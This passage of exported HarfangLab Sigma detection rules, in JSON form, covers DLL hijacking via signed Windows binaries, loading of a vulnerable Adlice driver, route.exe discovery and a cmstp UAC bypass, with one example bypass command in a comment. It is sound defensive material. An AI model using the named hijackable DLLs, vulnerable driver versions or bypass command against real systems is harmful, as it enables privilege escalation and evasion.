"rule_description": "Detects the suspicious execution of the legitimate cvtres.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the cvtres.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2025-11-12",
"rule_modified_date": "2025-12-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c4147702-b07a-45c6-ab0c-80a8f3001000",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085370Z",
"creation_date": "2026-03-23T11:45:34.085372Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085377Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/ph4nt0mbyt3/Darkside",
"https://www.adlice.com/fr/roguekiller/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_byovd_truesight_darkside_load.yml",
"content": "title: Adlice Vulnerable Driver Loaded\nid: c4147702-b07a-45c6-ab0c-80a8f3001000\ndescription: |\n Detects the loading of a known vulnerable Adlice Software driver in an unusual context.\n This likely indicates the driver has been deployed by a malicious actor for exploitation.\n This technique is usually called BYOVD (Bring Your Own Vulnerable Driver).\n It is recommended to check if the process that loaded the driver is a legitimate one from Adlice Software.\nreferences:\n - https://github.com/ph4nt0mbyt3/Darkside\n - https://www.adlice.com/fr/roguekiller/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2023/11/30\nmodified: 2025/09/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1068\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.VulnerableDriver\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection_exact:\n DriverSha256: 'bfc2ef3b404294fe2fa05a8b71c7f786b58519175b7202a69fe30f45e607ff1c'\n\n selection_by_desc:\n Company: 'Adlice Software'\n InternalName: 'Truesight'\n OriginalFileName: 'Truesight'\n ProductVersion|re:\n - '^3\\.[0-3](?:\\.\\d+)?$' # > 3.0, <= 3.3.?\n - '^2\\.0\\.2$' # == 2.0.2\n Signed: 'true'\n SignatureStatus: 'Valid'\n\n filter_legitimate_uses:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\drivers\\'\n - '?:\\Windows\\System32\\DriverStore\\FileRepository\\'\n - '?:\\Windows\\System32\\spool\\drivers\\'\n - '?:\\Windows\\WinSxS\\'\n ImageLoaded|endswith: '\\truesight.sys'\n\n condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n - Some unidentified legitimate software might deploy and rely on the vulnerable driver as well.\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c4147702-b07a-45c6-ab0c-80a8f3001000",
"rule_name": "Adlice Vulnerable Driver Loaded",
"rule_description": "Detects the loading of a known vulnerable Adlice Software driver in an unusual context.\nThis likely indicates the driver has been deployed by a malicious actor for exploitation.\nThis technique is usually called BYOVD (Bring Your Own Vulnerable Driver).\nIt is recommended to check if the process that loaded the driver is a legitimate one from Adlice Software.\n",
"rule_creation_date": "2023-11-30",
"rule_modified_date": "2025-09-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c456e152-cc03-4950-9835-a23e13694f56",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590716Z",
"creation_date": "2026-03-23T11:45:34.590719Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590727Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_charmap.yml",
"content": "title: DLL Hijacking via charmap.exe\nid: c456e152-cc03-4950-9835-a23e13694f56\ndescription: |\n Detects potential Windows DLL Hijacking via charmap.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'charmap.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\GetUName.dll'\n - '\\MSFTEDIT.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c456e152-cc03-4950-9835-a23e13694f56",
"rule_name": "DLL Hijacking via charmap.exe",
"rule_description": "Detects potential Windows DLL Hijacking via charmap.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c465c818-727b-41e6-8293-c8a521169d0d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077795Z",
"creation_date": "2026-03-23T11:45:34.077797Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077802Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ctfmon.yml",
"content": "title: DLL Hijacking via ctfmon.exe\nid: c465c818-727b-41e6-8293-c8a521169d0d\ndescription: |\n Detects potential Windows DLL Hijacking via ctfmon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ctfmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\MsCtfMonitor.DLL'\n - '\\MSUTB.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c465c818-727b-41e6-8293-c8a521169d0d",
"rule_name": "DLL Hijacking via ctfmon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ctfmon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c4b24153-3c9b-4435-97a6-d340a146c01a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296824Z",
"creation_date": "2026-03-23T11:45:35.296832Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296842Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://twitter.com/TheDFIRReport/status/1441052231982329857",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_discovery_route.yml",
"content": "title: Network Discovered via route.exe\nid: c4b24153-3c9b-4435-97a6-d340a146c01a\ndescription: |\n Detects the execution of the route command with the print option.\n Route.exe is a legitimate Microsoft binary that can be used by attackers during the discovery phase to enumerate the network's routing tables.\n It is recommended to analyze the process responsible for the execution of route.exe to look for malicious content or actions.\nreferences:\n - https://twitter.com/TheDFIRReport/status/1441052231982329857\n - https://attack.mitre.org/techniques/T1016/\ndate: 2023/01/10\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'route.exe'\n CommandLine|contains: ' print'\n CurrentDirectory:\n - '?:\\windows\\\\*'\n - '?:\\ProgramData\\\\*'\n - '?:\\PerfLogs\\\\*'\n - '?:\\temp\\\\*'\n - '?:\\users\\\\*'\n - '?:\\\\?Recycle.Bin\\\\*'\n - '?:\\'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n\n exclusion_sdiagnhost:\n ParentImage:\n - '?:\\Windows\\System32\\sdiagnhost.exe'\n - '?:\\Windows\\SysWOW64\\sdiagnhost.exe'\n\n exclusion_azure:\n ParentImage:\n - '?:\\WindowsAzure\\Packages\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n\n exclusion_carestream:\n ParentCommandLine: 'powershell.exe -noprofile -executionpolicy bypass -file ?:\\Program Files (x86)\\Carestream\\Smart Link Agent\\Gateway\\Scripts\\autoreport\\autoreport.ps1 autoreport_report.html'\n\n exclusion_netgateway:\n GrandparentImage|endswith: '\\NetGW.Main.Replica.exe'\n\n exclusion_avmvpn:\n GrandparentImage|endswith: '\\nwtsrv.exe'\n ParentCommandLine|endswith: '.tmp'\n\n exclusion_centrastage_ram:\n ParentImage|endswith: '\\AEMAgent.exe'\n GrandparentImage|endswith: '\\CagService.exe'\n\n exclusion_fsecure:\n ParentImage|endswith: 'F-Secure\\Client Security\\diagnostics\\fsdiag.exe'\n GrandparentImage|endswith: 'F-Secure\\Client Security\\ui\\fssettings.exe'\n\n # netstat -nr calls cmd /c route.exe print under the hood...\n exclusion_netstat:\n GrandparentImage:\n - '?:\\windows\\system32\\netstat.exe'\n - '?:\\windows\\syswow64\\netstat.exe'\n\n exclusion_gathernetwork:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c route print >> config\\\\*.txt'\n GrandparentCommandLine: '?:\\windows\\system32\\cscript.exe ?:\\windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_synctrayzor:\n CommandLine: 'route print 0.0.0.0'\n # \\AppData\\Roaming\\SyncTrayzor\\syncthing.exe\n ParentImage|endswith: '\\syncthing.exe'\n GrandparentImage|endswith: '\\syncthing.exe'\n\n\n exclusion_puppet:\n Ancestors|contains: '?:\\Program Files\\Puppet Labs\\\\*\\bin\\ruby.exe'\n\n exclusion_hp:\n ParentImage|endswith: '\\TouchpointAnalyticsClientService.exe'\n ProcessSigned: 'true'\n ProcessSignature|contains: 'HP Inc'\n\n exclusion_interactive:\n ProcessGrandparentImage: '?:\\Windows\\explorer.exe'\n ProcessParentImage:\n - '?:\\Windows\\system32\\cmd.exe'\n - '?:\\Windows\\syswow64\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'\n\n exclusion_medsys:\n ParentImage: '?:\\pilote\\NoyauEVM\\NoyauEVM.exe'\n\n exclusion_xtool_studio:\n GrandparentImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\xTool Studio\\xTool Studio.exe'\n\n exclusion_wakeonlan:\n ParentImage|endswith: '\\WakeOnLanBatch.exe'\n ProcessParentCompany: 'Dipisoft (www.dipisoft.com)'\n\n exclusion_pulse_secure:\n ParentImage: '?:\\Users\\\\*\\AppData\\Roaming\\Pulse Secure\\Host Checker\\dsHostChecker.exe'\n\n exclusion_f5:\n GrandparentImage: '?:\\Windows\\Downloaded Program Files\\f5unistall.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c4b24153-3c9b-4435-97a6-d340a146c01a",
"rule_name": "Network Discovered via route.exe",
"rule_description": "Detects the execution of the route command with the print option.\nRoute.exe is a legitimate Microsoft binary that can be used by attackers during the discovery phase to enumerate the network's routing tables.\nIt is recommended to analyze the process responsible for the execution of route.exe to look for malicious content or actions.\n",
"rule_creation_date": "2023-01-10",
"rule_modified_date": "2026-02-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c4bbcefd-fa8e-42ab-b515-284a8782a738",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082426Z",
"creation_date": "2026-03-23T11:45:34.082428Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082432Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/",
"https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mcoemcpy.yml",
"content": "title: DLL Hijacking via mcoemcpy.exe\nid: c4bbcefd-fa8e-42ab-b515-284a8782a738\ndescription: |\n Detects potential Windows DLL Hijacking via mcoemcpy.exe related to McAfee Oem Module.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mcoemcpy.exe'\n ImageLoaded|endswith: '\\McUtil.dll'\n\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'McAfee, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c4bbcefd-fa8e-42ab-b515-284a8782a738",
"rule_name": "DLL Hijacking via mcoemcpy.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mcoemcpy.exe related to McAfee Oem Module.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c4f7fe2f-e253-4959-b087-ef115db90e04",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099129Z",
"creation_date": "2026-03-23T11:45:34.099131Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099135Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wscadminui.yml",
"content": "title: DLL Hijacking via wscadminui.exe\nid: c4f7fe2f-e253-4959-b087-ef115db90e04\ndescription: |\n Detects potential Windows DLL Hijacking via wscadminui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wscadminui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\wscapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c4f7fe2f-e253-4959-b087-ef115db90e04",
"rule_name": "DLL Hijacking via wscadminui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wscadminui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c554e3b6-a069-4a89-89ba-f0648c009a3f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093133Z",
"creation_date": "2026-03-23T11:45:34.093135Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093140Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_cmstp.yml",
"content": "title: UAC Bypass Executed via cmstp\nid: c554e3b6-a069-4a89-89ba-f0648c009a3f\ndescription: |\n Detects the execution of the cmstp.exe UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the parent process and user session responsible for UAC bypass to look for malicious content or actions.\nreferences:\n - https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/25\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\cmstp.exe'\n - OriginalFileName: 'CMSTP.EXE'\n selection_2:\n # example: \"cmstp.exe /s /au malicious_profile.inf\"\n # NOTE: spaces will always be present for this matching, this also allow to not have special exclude lists for \"/su\".\n CommandLine|contains:\n # /s: \"Silent mode\"\n - '/s '\n # /au: \"All User Install\"\n - '/au '\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
